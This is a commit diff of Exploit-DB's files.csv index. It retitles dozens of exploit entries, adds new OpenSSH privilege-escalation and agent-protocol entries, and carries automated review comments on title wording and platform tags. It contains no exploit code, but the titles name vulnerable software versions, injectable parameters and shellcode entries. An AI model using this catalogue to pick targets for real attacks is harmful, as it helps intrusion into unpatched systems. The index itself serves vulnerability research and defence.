DB: 2016-12-24

3 new exploits

WinFTP Server 2.0.2 - (PASV) Remote Denial of Service
WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service

WinFTP Server 2.3.0 - (NLST) Denial of Service
WinFTP Server 2.3.0 - 'NLST' Denial of Service

vxFtpSrv 2.0.3 - CWD command Remote Buffer Overflow (PoC)
vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)

OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation

X7 Chat 2.0.5 - lib/message.php preg_replace() PHP Code Execution (Metasploit)
X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)

OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading

X7 Chat 2.0 - (help_file) Remote Command Execution
X7 Chat 2.0 - 'help_file' Parameter Remote Command Execution
Ultimate WebBoard 3.00 - (Category) SQL Injection
PromoteWeb MySQL - 'go.php id' SQL Injection
212Cafe Board 0.07 - (view.php qID) SQL Injection
Ultimate WebBoard 3.00 - 'Category' Parameter SQL Injection
PromoteWeb MySQL - 'id' Parameter SQL Injection
212Cafe Board 0.07 - 'qID' Parameter SQL Injection
The Gemini Portal - 'lang' Remote File Inclusion
RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection
ASPapp KnowledgeBase - 'catid' SQL Injection
The Gemini Portal 4.7 - 'lang' Parameter Remote File Inclusion
RPG.Board 0.0.8Beta2 - 'showtopic' Parameter SQL Injection
ASPapp KnowledgeBase - 'catid' Parameter SQL Injection

X7 Chat 2.0.1A1 - (mini.php help_file) Local File Inclusion
X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion
CoAST 0.95 - (sections_file) Remote File Inclusion
Real Estate Manager - 'cat_id' SQL Injection
LnBlog 0.9.0 - (plugin) Local File Inclusion
PlugSpace 0.1 - (index.php navi) Local File Inclusion
MyCard 1.0.2 - (gallery.php id) SQL Injection
PowerPortal 2.0.13 - 'path' Local Directory Traversal
PHP-Lance 1.52 - (show.php catid) SQL Injection
Yoxel 1.23beta - (itpm_estimate.php a) Remote Code Execution
CoAST 0.95 - 'sections_file' Parameter Remote File Inclusion
Real Estate Manager 1.01 - 'cat_id' Parameter SQL Injection
LnBlog 0.9.0 - 'plugin' Parameter Local File Inclusion
PlugSpace 0.1 - 'navi' Parameter Local File Inclusion
MyCard 1.0.2 - 'id' Parameter SQL Injection
PowerPortal 2.0.13 - 'path' Parameter Local Directory Traversal
PHP-Lance 1.52 - 'catid' Parameter SQL Injection
Yoxel 1.23beta - 'itpm_estimate.php' Remote Code Execution

ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection
ZEELYRICS 2.0 - 'bannerclick.php' SQL Injection
Pro Chat Rooms 3.0.3 - (guid) SQL Injection
Pilot Group eTraining - 'news_read.php id' SQL Injection
BbZL.php 0.92 - (lien_2) Local Directory Traversal
Pro Chat Rooms 3.0.3 - SQL Injection
Pilot Group eTraining - 'news_read.php' SQL Injection
BbZL.php 0.92 - 'lien_2' Parameter Local Directory Traversal

Arcadem Pro - 'articlecat' SQL Injection
Arcadem Pro - 'articlecat' Parameter SQL Injection
ArabCMS - 'rss.php rss' Local File Inclusion
FAQ Management Script - 'catid' SQL Injection
ArabCMS - 'rss.php' Local File Inclusion
FAQ Management Script - 'catid' Parameter SQL Injection

BookMarks Favourites Script - 'view_group.php id' SQL Injection
BookMarks Favourites Script - 'id' Parameter SQL Injection

BMForum 5.6 - (tagname) SQL Injection
BMForum 5.6 - 'tagname' Parameter SQL Injection
Crux Gallery 1.32 - (index.php theme) Local File Inclusion
phpScheduleIt 1.2.10 - (reserve.php) Remote Code Execution
RPortal 1.1 - (file_op) Remote File Inclusion
Crux Gallery 1.32 - 'theme' Parameter Local File Inclusion
phpScheduleIt 1.2.10 - 'reserve.php' Remote Code Execution
RPortal 1.1 - 'file_op' Parameter Remote File Inclusion

Link Trader - 'ratelink.php lnkid' SQL Injection
Link Trader - 'lnkid' Parameter SQL Injection
OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion
OpenX 2.6 - (ac.php bannerid) Blind SQL Injection
OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion
OpenX 2.6 - 'bannerid' Parameter Blind SQL Injection

X7 Chat 2.0.5 - (Authentication Bypass) SQL Injection
X7 Chat 2.0.5 - Authentication Bypass

Arcadem Pro 2.8 - (article) Blind SQL Injection
Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection

Link Trader - (lnkid) SQL Injection

phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection (Metasploit)
phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)

PowerPortal 1.1/1.3 - modules.php Traversal Arbitrary Directory Listing
PowerPortal 1.1/1.3 - 'modules.php' Traversal Arbitrary Directory Listing

Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion
Atomic Photo Album 0.x/1.0 - 'Apa_PHPInclude.INC.php' Remote File Inclusion
BMForum 3.0 - topic.php Multiple Parameter Cross-Site Scripting
BMForum 3.0 - forums.php Multiple Parameter Cross-Site Scripting
BMForum 3.0 - post.php forumid Parameter Cross-Site Scripting
BMForum 3.0 - announcesys.php forumid Parameter Cross-Site Scripting
BMForum 3.0 - 'topic.php' Cross-Site Scripting
BMForum 3.0 - 'forums.php' Cross-Site Scripting
BMForum 3.0 - 'post.php' Cross-Site Scripting
BMForum 3.0 - 'announcesys.php' Cross-Site Scripting
PowerPortal 1.1/1.3 - 'index.php' search Parameter Cross-Site Scripting
PowerPortal 1.1/1.3 - search.php search Parameter Cross-Site Scripting
PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting
PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting
X7 Chat 2.0.4 - sources/frame.php room Parameter Cross-Site Scripting
X7 Chat 2.0.4 - upgradev1.php INSTALL_X7CHATVERSION Parameter Cross-Site Scripting
X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting
X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting
BMForum 5.6 - 'index.php' outpused Parameter Cross-Site Scripting
BMForum 5.6 - newtem/footer/bsd01footer.php Multiple Parameter Cross-Site Scripting
BMForum 5.6 - newtem/header/bsd01header.php Multiple Parameter Cross-Site Scripting
BMForum 5.6 - 'index.php' Cross-Site Scripting
BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting
BMForum 5.6 - 'bsd01header.php' Cross-Site Scripting
Pilot Group eTraining - courses_login.php cat_id Parameter Cross-Site Scripting
Pilot Group eTraining - news_read.php id Parameter Cross-Site Scripting
Pilot Group eTraining - lessons_login.php Multiple Parameter Cross-Site Scripting
Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting
Pilot Group eTraining - 'news_read.php' Cross-Site Scripting
Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting

OpenX - /www/admin/plugin-index.php parent Parameter Cross-Site Scripting
OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting

Apache mod_session_crypto - Padding Oracle
Offensive Security 2016-12-24 05:01:17 +00:00
parent 26b1e8b6ad
commit 897e1fa191
6 changed files with 639 additions and 93 deletions

files.csv (114 changed lines)

@ -443,7 +443,7 @@ id,file,description,date,author,platform,type,port
2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control - 'ole32.dll' Denial of Service",2006-12-18,shinnai,windows,dos,0
2947,platforms/multiple/dos/2947.pl,"wget 1.10.2 - (Unchecked Boundary Condition) Denial of Service",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0
2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption",2006-12-19,"Breno Silva Pinto",multiple,dos,0
2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - (PASV) Remote Denial of Service",2006-12-19,shinnai,windows,dos,0
2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service",2006-12-19,shinnai,windows,dos,0
2954,platforms/linux/dos/2954.html,"KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception Exploit",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0
2961,platforms/hardware/dos/2961.py,"Hewlett-Packard (HP) FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0
2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 - (ActiveX Control) Denial of Service",2006-12-20,shinnai,windows,dos,0
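Review bot: the renamed 2952 title uses a bare 'PASV' while the existing FTP entry 35188 in this same file reads "Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow"; pick one form for FTP-verb titles ('PASV' Command ... is the more descriptive one) so a search on the command name matches both rows.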
@ -801,7 +801,7 @@ id,file,description,date,author,platform,type,port
6554,platforms/windows/dos/6554.html,"Google Chrome - Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos,0
6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)",2008-09-25,securfrog,windows,dos,0
6565,platforms/windows/dos/6565.txt,"K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer Denial of Service (PoC)",2008-09-25,Aodrulez,windows,dos,0
6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - (NLST) Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0
6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - 'NLST' Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0
6582,platforms/hardware/dos/6582.pl,"Microsoft Windows Mobile 6.0 - Device long name Remote Reboot Exploit",2008-09-26,"Julien Bedard",hardware,dos,0
6588,platforms/windows/dos/6588.txt,"Microsoft Windows - GDI+ '.ico' Remote Division By Zero Exploit",2008-09-26,"laurent gaffié",windows,dos,0
6609,platforms/windows/dos/6609.html,"Google Chrome 0.2.149.30 - Window Object Suppressing Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0
@ -811,7 +811,7 @@ id,file,description,date,author,platform,type,port
6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - PoC (MS08-052)",2008-09-28,"John Smith",windows,dos,0
6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x - Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0
6647,platforms/windows/dos/6647.c,"ESET SysInspector 1.1.1.0 - 'esiadrv.sys' (PoC)",2008-10-01,"NT Internals",windows,dos,0
6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - CWD command Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0
6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0
6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow (PoC)",2008-10-02,securfrog,windows,dos,0
6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0
6660,platforms/windows/dos/6660.txt,"Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
@ -8733,6 +8733,7 @@ id,file,description,date,author,platform,type,port
40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
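Review bot: 40962 is filed with platform linux, but nothing in its title ties the OpenSSH forwarded Unix domain socket issue to Linux specifically; the CSV already uses multiple for cross-platform entries (2947 and 2949 in the first hunk), so use multiple unless the PoC in 40962.txt is Linux-only. Port 0 is correct for a local entry.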
@ -14517,7 +14518,7 @@ id,file,description,date,author,platform,type,port
35170,platforms/hardware/remote/35170.txt,"Lexmark X651de - Printer Ready Message Value HTML Injection",2011-01-06,"dave b",hardware,remote,0
35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Execution",2011-01-05,d3c0der,windows,remote,0
35180,platforms/bsd/remote/35180.rb,"Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)",2014-11-06,Metasploit,bsd,remote,0
35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - lib/message.php preg_replace() PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80
35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80
35184,platforms/hardware/remote/35184.py,"Belkin n750 - jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080
35188,platforms/windows/remote/35188.py,"Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote,0
35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0
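Review bot: the 35183 rename drops "preg_replace()" along with the lib/ path, and that function name was the only part of the title identifying the vulnerable sink; trimming the path is fine, but keep the function, e.g. "X7 Chat 2.0.5 - 'message.php' preg_replace() PHP Code Execution (Metasploit)", so the row still tells a reader what class of bug the module exercises.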
@ -15192,6 +15193,7 @@ id,file,description,date,author,platform,type,port
40920,platforms/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0
40930,platforms/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,osx,remote,0
40949,platforms/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",cgi,remote,80
40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
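Review bot: the new 40963 title has a lowercase "agent Protocol" and, unlike its sibling 40962 added in this same patch, does not quote the affected component; suggest "OpenSSH < 7.4 - 'agent' Protocol Arbitrary Library Loading" or similar for consistency. The remote/port 22 classification should also be checked against the write-up in 40963.txt, since the title describes an issue in the agent protocol rather than in sshd itself.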
@ -16171,7 +16173,7 @@ id,file,description,date,author,platform,type,port
1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote File Inclusion",2006-04-30,Aesthetico,php,webapps,0
1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - 'lostpw.php' Remote File Inclusion",2006-04-30,cijfer,php,webapps,0
1733,platforms/php/webapps/1733.pl,"Invision Power Board 2.1.5 - (from_contact) SQL Injection",2006-05-01,"Ykstortion Security",php,webapps,0
1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0
1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Parameter Remote Command Execution",2006-05-02,rgod,php,webapps,0
1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3 / 2.3.8 - (show.php) Remote File Inclusion",2006-05-02,R@1D3N,php,webapps,0
1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion",2006-05-03,webDEViL,php,webapps,0
1747,platforms/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0
@ -19544,69 +19546,69 @@ id,file,description,date,author,platform,type,port
6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - 'FCKeditor' Arbitrary File Upload",2008-09-25,Stack,php,webapps,0
6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection",2008-09-26,Stack,php,webapps,0
6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - 'class_dir' Parameter Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0
6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'go.php id' SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - (view.php qID) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - 'Category' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'id' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - 'qID' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
6579,platforms/php/webapps/6579.txt,"Libra PHP File Manager 1.18 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0
6580,platforms/php/webapps/6580.txt,"Atomic Photo Album 1.1.0pre4 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0
6583,platforms/php/webapps/6583.txt,"Esqlanelapse Software Project 2.6.2 - Insecure Cookie Handling",2008-09-26,ZoRLu,php,webapps,0
6584,platforms/php/webapps/6584.txt,"The Gemini Portal 4.7 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0
6585,platforms/php/webapps/6585.txt,"openEngine 2.0 beta2 - Remote File Inclusion",2008-09-26,Crackers_Child,php,webapps,0
6586,platforms/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0
6587,platforms/php/webapps/6587.txt,"The Gemini Portal - 'lang' Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0
6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection",2008-09-26,0x90,php,webapps,0
6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' SQL Injection",2008-09-27,Crackers_Child,php,webapps,0
6587,platforms/php/webapps/6587.txt,"The Gemini Portal 4.7 - 'lang' Parameter Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0
6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' Parameter SQL Injection",2008-09-26,0x90,php,webapps,0
6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' Parameter SQL Injection",2008-09-27,Crackers_Child,php,webapps,0
6591,platforms/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0
6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - (mini.php help_file) Local File Inclusion",2008-09-27,NoGe,php,webapps,0
6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion",2008-09-27,NoGe,php,webapps,0
6593,platforms/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - SQL Injection",2008-09-27,elusiven,php,webapps,0
6594,platforms/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload",2008-09-27,Mi4night,php,webapps,0
6595,platforms/php/webapps/6595.txt,"Joovili 3.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps,0
6596,platforms/php/webapps/6596.txt,"E-Uploader Pro 1.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps,0
6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - (sections_file) Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0
6599,platforms/php/webapps/6599.txt,"Real Estate Manager - 'cat_id' SQL Injection",2008-09-27,CraCkEr,php,webapps,0
6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - (plugin) Local File Inclusion",2008-09-27,dun,php,webapps,0
6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - (index.php navi) Local File Inclusion",2008-09-27,dun,php,webapps,0
6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - (gallery.php id) SQL Injection",2008-09-27,r45c4l,php,webapps,0
6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0
6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - (show.php catid) SQL Injection",2008-09-27,InjEctOr5,php,webapps,0
6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - (itpm_estimate.php a) Remote Code Execution",2008-09-27,dun,php,webapps,0
6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - 'sections_file' Parameter Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0
6599,platforms/php/webapps/6599.txt,"Real Estate Manager 1.01 - 'cat_id' Parameter SQL Injection",2008-09-27,CraCkEr,php,webapps,0
6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - 'plugin' Parameter Local File Inclusion",2008-09-27,dun,php,webapps,0
6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - 'navi' Parameter Local File Inclusion",2008-09-27,dun,php,webapps,0
6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - 'id' Parameter SQL Injection",2008-09-27,r45c4l,php,webapps,0
6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Parameter Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0
6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - 'catid' Parameter SQL Injection",2008-09-27,InjEctOr5,php,webapps,0
6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - 'itpm_estimate.php' Remote Code Execution",2008-09-27,dun,php,webapps,0
6607,platforms/php/webapps/6607.txt,"X7 Chat 2.0.1A1 - Local File Inclusion",2008-09-27,JIKO,php,webapps,0
6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection",2008-09-28,"Hussin X",php,webapps,0
6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - 'bannerclick.php' SQL Injection",2008-09-28,"Hussin X",php,webapps,0
6610,platforms/asp/webapps/6610.txt,"ParsaWeb CMS - 'Search' SQL Injection",2008-09-28,BugReport.IR,asp,webapps,0
6611,platforms/php/webapps/6611.php,"PHPcounter 1.3.2 - 'index.php' SQL Injection",2008-09-28,StAkeR,php,webapps,0
6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - (guid) SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0
6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php id' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0
6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - (lien_2) Local Directory Traversal",2008-09-28,JIKO,php,webapps,0
6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0
6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0
6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - 'lien_2' Parameter Local Directory Traversal",2008-09-28,JIKO,php,webapps,0
6618,platforms/php/webapps/6618.txt,"Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps,0
6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - 'linkid' Parameter SQL Injection",2008-09-28,boom3rang,php,webapps,0
6621,platforms/php/webapps/6621.txt,"BbZL.php 0.92 - Insecure Cookie Handling",2008-09-28,Stack,php,webapps,0
6623,platforms/php/webapps/6623.txt,"events Calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",php,webapps,0
6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' SQL Injection",2008-09-29,"Hussin X",php,webapps,0
6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' Parameter SQL Injection",2008-09-29,"Hussin X",php,webapps,0
6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 - Insecure Cookie Handling",2008-09-29,Crackers_Child,php,webapps,0
6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script - Multiple SQL Injections",2008-09-29,"Super Cristal",php,webapps,0
6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php rss' Local File Inclusion",2008-09-29,JIKO,php,webapps,0
6629,platforms/php/webapps/6629.txt,"FAQ Management Script - 'catid' SQL Injection",2008-09-30,"Hussin X",php,webapps,0
6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php' Local File Inclusion",2008-09-29,JIKO,php,webapps,0
6629,platforms/php/webapps/6629.txt,"FAQ Management Script - 'catid' Parameter SQL Injection",2008-09-30,"Hussin X",php,webapps,0
6631,platforms/php/webapps/6631.txt,"SG Real Estate Portal 2.0 - Blind SQL Injection / Local File Inclusion",2008-09-30,SirGod,php,webapps,0
6632,platforms/php/webapps/6632.txt,"MiNBank 1.5.0 - Multiple Remote File Inclusion",2008-09-30,DaRkLiFe,php,webapps,0
6633,platforms/php/webapps/6633.txt,"eFront 3.5.1 / build 2710 - Arbitrary File Upload",2008-09-30,Pepelux,php,webapps,0
6634,platforms/php/webapps/6634.php,"SG Real Estate Portal 2.0 - Blind SQL Injection",2008-09-30,Stack,php,webapps,0
6635,platforms/php/webapps/6635.txt,"SG Real Estate Portal 2.0 - Insecure Cookie Handling",2008-09-30,Stack,php,webapps,0
6636,platforms/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 - Blind SQL Injection",2008-09-30,ka0x,php,webapps,0
6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - 'view_group.php id' SQL Injection",2008-09-30,"Hussin X",php,webapps,0
6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - 'id' Parameter SQL Injection",2008-09-30,"Hussin X",php,webapps,0
6639,platforms/php/webapps/6639.txt,"Pritlog 0.4 - 'Filename' Remote File Disclosure",2008-09-30,Pepelux,php,webapps,0
6640,platforms/php/webapps/6640.pl,"ADN Forum 1.0b - Blind SQL Injection",2008-10-01,StAkeR,php,webapps,0
6641,platforms/php/webapps/6641.txt,"MySQL Quick Admin 1.5.5 - 'cookie' Local File Inclusion",2008-10-01,JosS,php,webapps,0
6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - (tagname) SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0
6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - 'tagname' Parameter SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0
6643,platforms/php/webapps/6643.txt,"Discussion Forums 2k 3.3 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0
6644,platforms/php/webapps/6644.txt,"Noname CMS 1.0 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0
6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - (index.php theme) Local File Inclusion",2008-10-01,StAkeR,php,webapps,0
6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - (reserve.php) Remote Code Execution",2008-10-01,EgiX,php,webapps,0
6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - (file_op) Remote File Inclusion",2008-10-01,Kad,php,webapps,0
6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - 'theme' Parameter Local File Inclusion",2008-10-01,StAkeR,php,webapps,0
6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - 'reserve.php' Remote Code Execution",2008-10-01,EgiX,php,webapps,0
6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - 'file_op' Parameter Remote File Inclusion",2008-10-01,Kad,php,webapps,0
6649,platforms/php/webapps/6649.txt,"phpscripts Ranking Script - Insecure Cookie Handling",2008-10-01,Crackers_Child,php,webapps,0
6650,platforms/php/webapps/6650.txt,"Link Trader - 'ratelink.php lnkid' SQL Injection",2008-10-01,"Hussin X",php,webapps,0
6650,platforms/php/webapps/6650.txt,"Link Trader - 'lnkid' Parameter SQL Injection",2008-10-01,"Hussin X",php,webapps,0
